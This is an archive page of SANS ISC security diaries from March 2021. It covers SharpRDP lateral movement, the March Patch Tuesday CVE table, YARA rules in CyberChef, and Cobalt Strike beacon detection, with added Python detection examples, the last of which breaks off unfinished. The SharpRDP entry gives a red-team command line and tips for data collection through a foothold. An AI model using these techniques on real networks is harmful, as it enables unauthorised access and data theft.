
Archive for March, 2021

SharpRDP – PSExec without PSExec, PSRemoting without PowerShell, (Wed, Mar 10th)

With the amount of remediation folks have these days to catch malicious execution of PowerShell or the use of tools like psexec, red teams have to be asking themselves: what approach is next for lateral movement after you get that first foothold?

For me, if the easy stuff isn’t an option, SharpRDP makes a pretty easy “next tool on the shelf”.

SharpRDP takes advantage of the fact that Microsoft took a lot of pages from the Citrix ICA protocol when they put the RDP protocol together.  RDP isn’t just for remote desktop – it implements “channels” which can be used for all sorts of things.  In the past, the most common use of channels in ICA was to differentiate printer traffic from interactive traffic and apply different QoS policies to each.  But SharpRDP takes it to the next level, and allows you to start a session and instruct it to execute code after it starts!

For the red team, this has oodles of attraction – often you don’t have a GUI, and this lets you run pretty much anything you want on a remote host over a traditionally “GUI” protocol.  Since it’s in an RDP session, it’s an actual terminal session (not a shell), so all of your inputs and outputs are handled correctly.  While you could theoretically run a CLI terminal session over this, I’m not sure that this is implemented – I haven’t needed to figure that piece out yet if it is.  

For someone on the blue team, this is a tough thing to catch – it’s going to look like any other RDP session that your admins might make, executing “something” after it starts.  

What does a session look like?  It’s as simple as:

> SharpRDP.exe computername=targetservername command="" username=<username> password=<password>
[+] Connected to          :  targetservername
[+] Execution priv type   :  non-elevated
[+] Executing
[+] Disconnecting from    :  targetservername
[+] Connection closed     :  targetservername

Normally I’ll have the “command” be a CMD file that does whatever I’m trying to accomplish – usually it’s data collection of some kind, with the data coming back to the host that I have my foothold on.  Remember that if your command is not an actual executable (for instance, “dir” is not an executable file; it’s built into cmd.exe), you will have to use “c:\windows\system32\cmd.exe /c” to load the cmd interpreter prior to executing your “thing”.

My go-to is single letter CMD files, so for instance t.cmd.  This file is usually homed on my foot-hold server, and sends the data back to a share on that same server.  Also the output normally has %COMPUTERNAME% in the filename so I can keep the files straight (and not have name collisions).

Protections?  LAPS is a good one – if every target host has a different password, you’ll have to collect all of that first before you can use SharpRDP.  (https://isc.sans.edu/forums/diary/Microsoft+LAPS+Blue+Team+Red+Team/24528/).  Really though if an attacker is far enough in to fire up RDP sessions to arbitrary hosts, harvesting the LAPS passwords isn’t too tough, once you figure out that LAPS is in play.  MFA on RDP sessions is really your best bet.  I’ve got a few clients running this, and it’s pretty slick.  Most MFA solutions allow you to extend RDP authentication, usually it’s a “click OK” or a biometric confirmation (Face-ID usually) on your phone to complete the RDP session.

If you’ve got MFA on your servers for RDP access, then SharpRDP use is defeated nicely, and your detection that you can code into your SIEM is whatever event is generated by “failed MFA on RDP”.  Your next-level protection in that case is “alert on any new registration of MFA users”.  You’ll want any registration of new users, or registration of new phones to existing users to go to a number of people – once MFA is a main protection, it also of course becomes a main target.
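One way to turn the blue-team observation above into a concrete check, as an added example that is not part of the diary or of the SharpRDP project: an interactive RDP logon (event 4624, logon type 10) whose very first process creation (event 4688) is a script host started a couple of seconds after the logon, often followed by a logoff (4634) seconds later, looks nothing like a human admin session. The events, field names and the 15-second threshold are constructed for the example; real event records carry many more fields.

```python
from datetime import datetime, timedelta

# Constructed sample events with a handful of fields from Windows Security events
# 4624 (logon; logon_type 10 = RemoteInteractive/RDP), 4688 (process creation)
# and 4634 (logoff).  Session 0x1a2b3 is an ordinary admin session; 0x4c5d6 runs a
# command file from a share two seconds after the logon and logs off seconds later.
SAMPLE_EVENTS = [
    {"time": "2021-03-10T09:12:00", "id": 4624, "logon_type": 10, "logon_id": "0x1a2b3",
     "user": "ops-admin", "src_ip": "10.10.5.21"},
    {"time": "2021-03-10T09:13:47", "id": 4688, "logon_id": "0x1a2b3",
     "process": r"C:\Windows\System32\mmc.exe", "cmdline": "mmc.exe services.msc"},
    {"time": "2021-03-10T10:00:00", "id": 4624, "logon_type": 10, "logon_id": "0x4c5d6",
     "user": "svc-backup", "src_ip": "10.10.7.40"},
    {"time": "2021-03-10T10:00:02", "id": 4688, "logon_id": "0x4c5d6",
     "process": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c \\10.10.7.40\share\t.cmd"},
    {"time": "2021-03-10T10:00:06", "id": 4634, "logon_id": "0x4c5d6"},
    # A network (type 3) logon that also runs cmd.exe quickly: not RDP, so not flagged.
    {"time": "2021-03-10T11:30:00", "id": 4624, "logon_type": 3, "logon_id": "0x7e8f9",
     "user": "svc-backup", "src_ip": "10.10.7.40"},
    {"time": "2021-03-10T11:30:01", "id": 4688, "logon_id": "0x7e8f9",
     "process": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def _t(ts: str) -> datetime:
    return datetime.fromisoformat(ts)


def find_scripted_rdp_sessions(events, max_seconds_to_first_process=15):
    """Flag RDP logons (4624, type 10) whose first process creation (4688) is a
    script host started within `max_seconds_to_first_process` of the logon.
    Returns one dict per finding, with the session length if a 4634 was seen."""
    ordered = sorted(events, key=lambda e: e["time"])
    rdp_logons = {e["logon_id"]: e for e in ordered
                  if e["id"] == 4624 and e["logon_type"] == 10}
    first_process, logoff = {}, {}
    for e in ordered:
        lid = e["logon_id"]
        if lid not in rdp_logons:
            continue
        if e["id"] == 4688 and lid not in first_process:
            first_process[lid] = e
        elif e["id"] == 4634:
            logoff[lid] = e
    findings = []
    for lid, logon in rdp_logons.items():
        proc = first_process.get(lid)
        if proc is None:
            continue
        seconds = (_t(proc["time"]) - _t(logon["time"])).total_seconds()
        image = proc["process"].rsplit("\\", 1)[-1].lower()
        if seconds <= max_seconds_to_first_process and image in SCRIPT_HOSTS:
            findings.append({
                "logon_id": lid, "user": logon["user"], "src_ip": logon["src_ip"],
                "seconds_to_first_process": seconds, "cmdline": proc["cmdline"],
                "session_seconds": ((_t(logoff[lid]["time"]) - _t(logon["time"])).total_seconds()
                                    if lid in logoff else None),
            })
    return findings


if __name__ == "__main__":
    for finding in find_scripted_rdp_sessions(SAMPLE_EVENTS):
        print(finding)
```

The correlation key is the logon ID shared by 4624, 4688 and 4634, which is why 4688 auditing (with command-line logging) has to be on for this to work; the same logic translates directly into a SIEM join on that field.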

All that being said, MFA on RDP is not widely implemented in March of 2021 – there are a lot of people working on fixing this though.  The uptick in migrating VPNs and Citrix Gateways to newer MFA solutions means that it’s becoming much easier to extend MFA to more and more platforms, and RDP is one of the easier and more impactful ones that we see picked.

SharpRDP is homed here:
https://github.com/0xthirteen/SharpRDP
And has a full write-up here:
https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3

 

===============
Rob VandenBrink
[email protected]

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


Microsoft March 2021 Patch Tuesday, (Tue, Mar 9th)

This month we got patches for 122 vulnerabilities. Of these, 14 are critical, 5 are being exploited and 2 were previously disclosed.

The highlight this month goes to the Microsoft Exchange Server vulnerabilities that are being exploited and for which Microsoft made emergency patches available on March 2. If you have this software in your environment, especially if the service is exposed to the internet, and did not apply the patches, then in addition to applying them it is imperative that you check whether your system could already have been compromised. Johannes published a diary summarizing the vulnerabilities and giving advice on how to check for evidence of compromise.

In addition to the 4 Microsoft Exchange Server vulnerabilities, there is a fifth vulnerability being exploited which had been previously disclosed. This is an RCE affecting Microsoft Edge and Internet Explorer 11 (CVE-2021-26411) on multiple Windows versions. According to the vulnerability advisory, to exploit this vulnerability an attacker would have to convince a user to access a malicious website, as in a phishing scenario. The exploit is publicly disclosed, and exploitation has already been detected.

The highest CVSS score this month (9.90) was given to the Windows Hyper-V Remote Code Execution Vulnerability (CVE-2021-26867). The vulnerability advisory says that any Hyper-V client configured to use the Plan 9 file system could be vulnerable. An authenticated attacker who successfully exploited this vulnerability on a Hyper-V client could cause code to execute on the Hyper-V server.

And for the second month in a row, there is a critical RCE vulnerability affecting Windows DNS Server (CVE-2021-26897) with a CVSS of 9.80. According to the advisory, the vulnerability affects any DNS server, whether a standalone primary authoritative DNS server or a DNS server integrated with Active Directory. It also notes that to be vulnerable, a DNS server needs to have dynamic updates enabled.

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

Description
CVE | Disclosed | Exploited | Exploitability (older versions) | Exploitability (current version) | Severity | CVSS Base (avg) | CVSS Temporal (avg)

Application Virtualization Remote Code Execution Vulnerability
CVE-2021-26890 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Azure Sphere Unsigned Code Execution Vulnerability
CVE-2021-27074 | No | No | Less Likely | Less Likely | Critical | 6.2 | 5.6
CVE-2021-27080 | No | No | Less Likely | Less Likely | Critical | 9.3 | 9.3
Azure Virtual Machine Information Disclosure Vulnerability
CVE-2021-27075 | No | No | Less Likely | Less Likely | Important | 6.8 | 6.1
Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG
CVE-2020-27844 | No | No | - | - | - | - | -
Chromium CVE-2021-21159: Heap buffer overflow in TabStrip
CVE-2021-21159 | No | No | - | - | - | - | -
Chromium CVE-2021-21160: Heap buffer overflow in WebAudio
CVE-2021-21160 | No | No | - | - | - | - | -
Chromium CVE-2021-21161: Heap buffer overflow in TabStrip
CVE-2021-21161 | No | No | - | - | - | - | -
Chromium CVE-2021-21162: Use after free in WebRTC
CVE-2021-21162 | No | No | - | - | - | - | -
Chromium CVE-2021-21163: Insufficient data validation in Reader Mode
CVE-2021-21163 | No | No | - | - | - | - | -
Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS
CVE-2021-21164 | No | No | - | - | - | - | -
Chromium CVE-2021-21165: Object lifecycle issue in audio
CVE-2021-21165 | No | No | - | - | - | - | -
Chromium CVE-2021-21166: Object lifecycle issue in audio
CVE-2021-21166 | No | No | - | - | - | - | -
Chromium CVE-2021-21167: Use after free in bookmarks
CVE-2021-21167 | No | No | - | - | - | - | -
Chromium CVE-2021-21168: Insufficient policy enforcement in appcache
CVE-2021-21168 | No | No | - | - | - | - | -
Chromium CVE-2021-21169: Out of bounds memory access in V8
CVE-2021-21169 | No | No | - | - | - | - | -
Chromium CVE-2021-21170: Incorrect security UI in Loader
CVE-2021-21170 | No | No | - | - | - | - | -
Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation
CVE-2021-21171 | No | No | - | - | - | - | -
Chromium CVE-2021-21172: Insufficient policy enforcement in File System API
CVE-2021-21172 | No | No | - | - | - | - | -
Chromium CVE-2021-21173: Side-channel information leakage in Network Internals
CVE-2021-21173 | No | No | - | - | - | - | -
Chromium CVE-2021-21174: Inappropriate implementation in Referrer
CVE-2021-21174 | No | No | - | - | - | - | -
Chromium CVE-2021-21175: Inappropriate implementation in Site isolation
CVE-2021-21175 | No | No | - | - | - | - | -
Chromium CVE-2021-21176: Inappropriate implementation in full screen mode
CVE-2021-21176 | No | No | - | - | - | - | -
Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill
CVE-2021-21177 | No | No | - | - | - | - | -
Chromium CVE-2021-21178: Inappropriate implementation in Compositing
CVE-2021-21178 | No | No | - | - | - | - | -
Chromium CVE-2021-21179: Use after free in Network Internals
CVE-2021-21179 | No | No | - | - | - | - | -
Chromium CVE-2021-21180: Use after free in tab search
CVE-2021-21180 | No | No | - | - | - | - | -
Chromium CVE-2021-21181: Side-channel information leakage in autofill
CVE-2021-21181 | No | No | - | - | - | - | -
Chromium CVE-2021-21182: Insufficient policy enforcement in navigations
CVE-2021-21182 | No | No | - | - | - | - | -
Chromium CVE-2021-21183: Inappropriate implementation in performance APIs
CVE-2021-21183 | No | No | - | - | - | - | -
Chromium CVE-2021-21184: Inappropriate implementation in performance APIs
CVE-2021-21184 | No | No | - | - | - | - | -
Chromium CVE-2021-21185: Insufficient policy enforcement in extensions
CVE-2021-21185 | No | No | - | - | - | - | -
Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning
CVE-2021-21186 | No | No | - | - | - | - | -
Chromium CVE-2021-21187: Insufficient data validation in URL formatting
CVE-2021-21187 | No | No | - | - | - | - | -
Chromium CVE-2021-21188: Use after free in Blink
CVE-2021-21188 | No | No | - | - | - | - | -
Chromium CVE-2021-21189: Insufficient policy enforcement in payments
CVE-2021-21189 | No | No | - | - | - | - | -
Chromium CVE-2021-21190: Uninitialized Use in PDFium
CVE-2021-21190 | No | No | - | - | - | - | -
DirectX Elevation of Privilege Vulnerability
CVE-2021-24095 | No | No | More Likely | More Likely | Important | 7.0 | 6.1
Git for Visual Studio Remote Code Execution Vulnerability
CVE-2021-21300 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7
HEVC Video Extensions Remote Code Execution Vulnerability
CVE-2021-24089 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8
CVE-2021-24110 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-26902 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8
CVE-2021-27047 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-27048 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-27049 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-27050 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-27051 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-27061 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8
CVE-2021-27062 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Internet Explorer Memory Corruption Vulnerability
CVE-2021-26411 | Yes | Yes | Detected | Detected | Critical | 8.8 | 7.9
Internet Explorer Remote Code Execution Vulnerability
CVE-2021-27085 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.9
Microsoft Excel Remote Code Execution Vulnerability
CVE-2021-27053 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-27054 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2021-26412 | No | No | Less Likely | Less Likely | Critical | 9.1 | 8.2
CVE-2021-26854 | No | No | Less Likely | Less Likely | Important | 6.6 | 5.8
CVE-2021-26855 | No | Yes | Detected | Detected | Critical | 9.1 | 8.4
CVE-2021-26857 | No | Yes | More Likely | Detected | Critical | 7.8 | 7.2
CVE-2021-26858 | No | Yes | Detected | Detected | Important | 7.8 | 7.2
CVE-2021-27065 | No | Yes | Detected | Detected | Critical | 7.8 | 7.2
CVE-2021-27078 | No | No | Less Likely | Less Likely | Important | 9.1 | 8.2
Microsoft Office ClickToRun Remote Code Execution Vulnerability
CVE-2021-27058 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Office Remote Code Execution Vulnerability
CVE-2021-24108 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-27057 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-27059 | No | No | Less Likely | Less Likely | Important | 7.6 | 6.6
Microsoft Power BI Information Disclosure Vulnerability
CVE-2021-26859 | No | No | Less Likely | Less Likely | Important | 7.7 | 6.7
Microsoft PowerPoint Remote Code Execution Vulnerability
CVE-2021-27056 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft SharePoint Server Information Disclosure Vulnerability
CVE-2021-27052 | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8
Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2021-27076 | No | No | More Likely | More Likely | Important | 8.8 | 7.7
Microsoft SharePoint Spoofing Vulnerability
CVE-2021-24104 | No | No | Less Likely | Less Likely | Important | 4.6 | 4.2
Microsoft Visio Security Feature Bypass Vulnerability
CVE-2021-27055 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1
Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability
CVE-2021-26887 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Windows Media Foundation Remote Code Execution Vulnerability
CVE-2021-26881 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
OpenType Font Parsing Remote Code Execution Vulnerability
CVE-2021-26876 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7
Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability
CVE-2021-27082 | No | No | - | - | Important | 7.8 | 6.8
Remote Access API Elevation of Privilege Vulnerability
CVE-2021-26882 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability
CVE-2021-27083 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Storage Spaces Controller Elevation of Privilege Vulnerability
CVE-2021-26880 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
User Profile Service Denial of Service Vulnerability
CVE-2021-26886 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Visual Studio Code ESLint Extension Remote Code Execution Vulnerability
CVE-2021-27081 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability
CVE-2021-27084 | No | No | Less Likely | Less Likely | Important | - | -
Visual Studio Code Remote Code Execution Vulnerability
CVE-2021-27060 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows 10 Update Assistant Elevation of Privilege Vulnerability
CVE-2021-27070 | No | No | Less Likely | Less Likely | Important | 7.3 | 6.4
Windows ActiveX Installer Service Information Disclosure Vulnerability
CVE-2021-26869 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Admin Center Security Feature Bypass Vulnerability
CVE-2021-27066 | No | No | Less Likely | Less Likely | Important | 4.3 | 3.8
Windows App-V Overlay Filter Elevation of Privilege Vulnerability
CVE-2021-26860 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Container Execution Agent Elevation of Privilege Vulnerability
CVE-2021-26865 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
CVE-2021-26891 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows DNS Server Denial of Service Vulnerability
CVE-2021-26896 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
CVE-2021-27063 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Windows DNS Server Remote Code Execution Vulnerability
CVE-2021-26877 | No | No | More Likely | More Likely | Important | 9.8 | 8.5
CVE-2021-26893 | No | No | Less Likely | Less Likely | Important | 9.8 | 8.5
CVE-2021-26894 | No | No | Less Likely | Less Likely | Important | 9.8 | 8.5
CVE-2021-26895 | No | No | Less Likely | Less Likely | Important | 9.8 | 8.5
CVE-2021-26897 | No | No | More Likely | More Likely | Critical | 9.8 | 8.5
Windows Error Reporting Elevation of Privilege Vulnerability
CVE-2021-24090 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Event Tracing Elevation of Privilege Vulnerability
CVE-2021-26872 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-26898 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-26901 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Event Tracing Information Disclosure Vulnerability
CVE-2021-24107 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Extensible Firmware Interface Security Feature Bypass Vulnerability
CVE-2021-26892 | No | No | Less Likely | Less Likely | Important | 6.2 | 5.6
Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2021-26868 | No | No | More Likely | More Likely | Important | 7.8 | 6.8
Windows Graphics Component Remote Code Execution Vulnerability
CVE-2021-26861 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Hyper-V Remote Code Execution Vulnerability
CVE-2021-26867 | No | No | Less Likely | Less Likely | Critical | 9.9 | 8.6
Windows Installer Elevation of Privilege Vulnerability
CVE-2021-26862 | No | No | Less Likely | Less Likely | Important | 6.3 | 5.5
Windows Media Photo Codec Information Disclosure Vulnerability
CVE-2021-26884 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows NAT Denial of Service Vulnerability
CVE-2021-26879 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Windows Overlay Filter Elevation of Privilege Vulnerability
CVE-2021-26874 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Print Spooler Elevation of Privilege Vulnerability
CVE-2021-1640 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-26878 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Projected File System Elevation of Privilege Vulnerability
CVE-2021-26870 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows UPnP Device Host Elevation of Privilege Vulnerability
CVE-2021-26899 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Update Service Elevation of Privilege Vulnerability
CVE-2021-26866 | No | No | Less Likely | Less Likely | Important | 7.1 | 6.2
Windows Update Stack Elevation of Privilege Vulnerability
CVE-2021-26889 | No | No | Less Likely | Less Likely | Important | 7.1 | 6.2
Windows Update Stack Setup Elevation of Privilege Vulnerability
CVE-2021-1729 | No | No | Less Likely | Less Likely | Important | 7.1 | 6.2
Windows User Profile Service Elevation of Privilege Vulnerability
CVE-2021-26873 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1
Windows Virtual Registry Provider Elevation of Privilege Vulnerability
CVE-2021-26864 | No | No | Less Likely | Less Likely | Important | 8.4 | 7.3
Windows WalletService Elevation of Privilege Vulnerability
CVE-2021-26871 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-26885 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Win32k Elevation of Privilege Vulnerability
CVE-2021-27077 | Yes | No | Less Likely | Less Likely | Important | 7.8 | 7.0
CVE-2021-26863 | No | No | More Likely | More Likely | Important | 7.0 | 6.1
CVE-2021-26875 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
CVE-2021-26900 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8


Renato Marinho
Morphus Labs | LinkedIn | Twitter


YARA and CyberChef, (Mon, Mar 8th)

If you prefer a graphical user interface to match YARA rules, you can try CyberChef.

YARA is a pattern matching tool, known as “The pattern matching swiss knife”.

CyberChef is a web app for all kinds of (file) analysis techniques, known as “The Cyber Swiss Army Knife”.

And what do you get when you combine two Swiss knives? One really big Swiss knife 🙂

CyberChef supports YARA rules.

Here I added one YARA rule to detect Office files with VBA macros. More precisely: ole files that contain the premise of a compressed, default VBA source code header.

YARA rules that match the input (a Word document, .doc, with VBA code in this example) are listed in the output.

Since CyberChef also has an unzip function, you can apply YARA rules to the files contained in a ZIP file (something the YARA tool itself cannot do):

If you want to copy the recipes, they are below.

Just YARA:

https://gchq.github.io/CyberChef/#recipe=YARA_Rules('rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D',false,false,false,false)

UNZIP + YARA:

https://gchq.github.io/CyberChef/#recipe=Unzip('',false)YARA_Rules('rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D',false,false,false,false)
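The rule is only visible above in its URL-encoded form, so as an added example (my own code, not the diary's, not CyberChef's and not YARA) here is how to recover the rule text from the recipe link, and a pure-Python evaluation of what this particular rule checks: the OLE magic at offset 0 and the `Attribut\x00e` token of a compressed VBA stream. The Unzip step of the second recipe is mirrored by testing every member of a ZIP. The two "documents" are constructed byte strings that carry only the parts the rule looks at, not real Office files.

```python
import io
import re
import urllib.parse
import zipfile

# The "Just YARA" recipe link from the diary.
RECIPE_URL = ("https://gchq.github.io/CyberChef/#recipe=YARA_Rules('rule%20ole_vba%20%7B%5Cn"
              "%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22"
              "%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D"
              "%200xd0cf11e0%5Cn%7D',false,false,false,false)")


def rule_from_recipe(url: str) -> str:
    """Recover the rule text: percent-decode the first YARA_Rules argument, then undo
    CyberChef's argument escaping (backslash-n for a newline, a doubled backslash
    for a literal backslash)."""
    fragment = url.split("#recipe=", 1)[1]
    arg = re.search(r"YARA_Rules\('(.*?)',", fragment).group(1)
    return re.sub(r"\\(n|\\)", lambda m: "\n" if m.group(1) == "n" else "\\",
                  urllib.parse.unquote(arg))


def rule_parts(rule_text: str):
    """Pull out the two things this rule checks: the $a string (YARA escapes decoded
    to bytes) and the big-endian uint32 expected at offset 0."""
    s = re.search(r'\$a\s*=\s*"([^"]*)"', rule_text).group(1)
    magic = re.search(r"uint32be\(0\)\s*==\s*(0x[0-9a-fA-F]+)", rule_text).group(1)
    return s.encode("latin-1").decode("unicode_escape").encode("latin-1"), int(magic, 16)


def ole_vba_matches(data: bytes, rule_text: str) -> bool:
    """Pure-Python evaluation of the rule's condition (this is not YARA itself)."""
    needle, magic = rule_parts(rule_text)
    return len(data) >= 4 and int.from_bytes(data[:4], "big") == magic and needle in data


def scan(data: bytes, rule_text: str, name: str = "input"):
    """Like the 'UNZIP + YARA' recipe: if the input is a ZIP, test each member."""
    if data[:4] == b"PK\x03\x04":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [(member, ole_vba_matches(zf.read(member), rule_text))
                    for member in zf.namelist()]
    return [(name, ole_vba_matches(data, rule_text))]


# Constructed samples: the OLE magic followed by padding, with and without the
# compressed-VBA header token; and a ZIP holding both.
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")
DOC_WITH_VBA = OLE_MAGIC + b"\x00" * 504 + b"Attribut\x00e VB_Nam\x00e = \"ThisDocument\"" + b"\x00" * 64
DOC_NO_VBA = OLE_MAGIC + b"\x00" * 504 + b"Word.Document.8" + b"\x00" * 64


def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("macro.doc", DOC_WITH_VBA)
        zf.writestr("clean.doc", DOC_NO_VBA)
    return buf.getvalue()


if __name__ == "__main__":
    rule = rule_from_recipe(RECIPE_URL)
    print(rule)
    print(scan(build_sample_zip(), rule))
```

Recovering the rule text first is the useful habit: a recipe link from a colleague or a blog post can be read and audited before anything is pasted into a browser tab, and the same text can be fed to the real YARA binary once you want to scan more than one file.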

And now I need to close my tabs and let the browser update itself 🙂 .

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


PCAPs and Beacons, (Sun, Mar 7th)

I like taking a closer look at capture files posted by Brad. In his latest diary entry, we have a capture file with Cobalt Strike traffic.

With the regular expression "^/....$" I look for URIs that are typical for Cobalt Strike shellcode (and Metasploit too):

Following this HTTP stream, I see data that looks encoded and has some repetitions, so this might be some kind of XOR encoding:

I export this data stream as a file:

Then pass it through my 1768.py Cobalt Strike beacon analysis tool:

And this is indeed the configuration of a beacon.
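The two steps above, the four-character URI filter and the "repetition suggests XOR" hunch, as an added example in Python (my own code, not the diary's and not 1768.py). It goes one step beyond the diary: four-character stager URIs from Metasploit and Cobalt Strike are generated so that the sum of their characters modulo 256 (the "checksum8") equals 92 for x86 and 93 for x64, a widely documented convention that the diary does not state and that I add here as an assumption you can verify against the frameworks' source. The proxy log lines and the XOR-encoded blob are constructed.

```python
import re
from collections import Counter

# Constructed proxy log lines (timestamp, client, method, URL, status): three
# ordinary requests and two four-character URIs whose checksum8 values match the
# stager convention described in the lead-in ("aZZG" sums to 348 -> 92,
# "aZZH" to 349 -> 93).  "/abcd" is four characters but sums to 138, so it is not flagged.
SAMPLE_LOG = """\
2021-03-07T14:02:11 10.0.0.12 GET http://203.0.113.10/aZZG 200
2021-03-07T14:02:13 10.0.0.12 GET http://203.0.113.10/ca 200
2021-03-07T14:02:15 10.0.0.12 GET http://cdn.example.net/css/main.css 200
2021-03-07T14:02:20 10.0.0.12 GET http://203.0.113.10/abcd 200
2021-03-07T14:02:22 10.0.0.12 GET http://203.0.113.10/aZZH 200
"""

# The diary's filter: a slash followed by exactly four characters.
FOUR_CHAR_URI = re.compile(r"^/(....)$")

# checksum8 values (assumption, see lead-in): 92 for x86 and 93 for x64 stagers.
STAGER_CHECKSUMS = {92: "x86 stager", 93: "x64 stager"}


def checksum8(s: str) -> int:
    """Sum of the byte values of the URI characters, modulo 256."""
    return sum(s.encode("ascii")) % 256


def url_path(url: str) -> str:
    return re.sub(r"^[a-z]+://[^/]*", "", url)


def find_stager_uris(log_text: str):
    """Return (timestamp, url, checksum, label) for four-character URIs whose
    checksum8 is one of the stager values."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        m = FOUR_CHAR_URI.match(url_path(fields[3]))
        if not m:
            continue
        cs = checksum8(m.group(1))
        if cs in STAGER_CHECKSUMS:
            hits.append((fields[0], fields[3], cs, STAGER_CHECKSUMS[cs]))
    return hits


def guess_single_byte_xor_key(data: bytes) -> int:
    """The diary's 'repetitions suggest XOR' observation as a heuristic: with a
    one-byte key, the most frequent ciphertext byte is usually key XOR 0x00,
    because zero padding dominates most binary blobs, so that byte is the key."""
    return Counter(data).most_common(1)[0][0]


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


# Constructed blob: mostly zero padding plus a couple of short strings, XOR'd with 0x69.
_PLAIN = b"\x00" * 40 + b"beacon.example" + b"\x00" * 30 + b"/api/v1" + b"\x00" * 20
SAMPLE_BLOB = xor_bytes(_PLAIN, 0x69)

if __name__ == "__main__":
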